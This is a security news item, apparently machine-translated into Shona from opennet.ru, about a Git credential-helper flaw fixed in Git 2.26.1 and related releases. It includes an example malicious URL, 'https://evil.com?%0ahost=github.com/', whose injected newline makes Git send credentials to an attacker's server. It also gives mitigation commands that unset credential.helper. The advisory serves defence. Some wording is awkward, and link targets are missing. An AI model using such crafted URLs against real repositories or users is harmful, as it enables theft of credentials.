kugadzirisa kuburitswa kweiyo yakagoverwa sosi control system Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 uye 2.17.4, mukati iyo yakabviswa () mumubati"", izvo zvinoita kuti zvitupa zvitumirwe kune asiriye mutengi kana git mutengi awana repository achishandisa yakanyatso kurongwa URL ine newline character. Kusagadzikana kunogona kushandiswa kuronga kuti magwaro kubva kune mumwe mugamuchiri atumirwe kune sevha inodzorwa neanorwisa.
Paunenge uchitsanangura URL yakaita senge βhttps://evil.com?%0ahost=github.com/β, chibatiso kana uchinge wabatana nemugadziri we evil.com achapfuura maparamendi echokwadi akatsanangurwa kugithub.com. Dambudziko rinoitika kana uchiita maoparesheni akadai se "git clone", kusanganisira kugadzirisa maURL emamodule (semuenzaniso, "git submodule update" inozogadzirisa maURL akataurwa mu.gitmodules faira kubva mudura). Kusagadzikana kwacho kune njodzi zvakanyanya mumamiriro ezvinhu apo mugadziri anoumba repository asina kuona iyo URL, semuenzaniso, kana uchishanda nema submodules, kana mumasisitimu anoita otomatiki zviito, semuenzaniso, mumapakiti ekuvaka zvinyorwa.
Kuvharisa kusasimba mushanduro itsva kupfuudza mutsara mutsva mune chero hunhu hunofambiswa kuburikidza neiyo credential exchange protocol. Nekugovera, unogona kuteedzera kuburitswa kwepakeji zvigadziriso pamapeji , , , , , , .
Sechigadziriso chekuvhara dambudziko Usashandise credential.helper paunenge uchipinda munzvimbo dzinochengeterwa veruzhinji uye usashandise "git clone" mu "--recurse-submodules" modhi ine marepositori asina kuvharwa. Kudzima zvachose credential.helper handler, inoita uye kutora mapassword kubva , kuchengetedzwa kana faira rine mapassword, unogona kushandisa mirairo:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru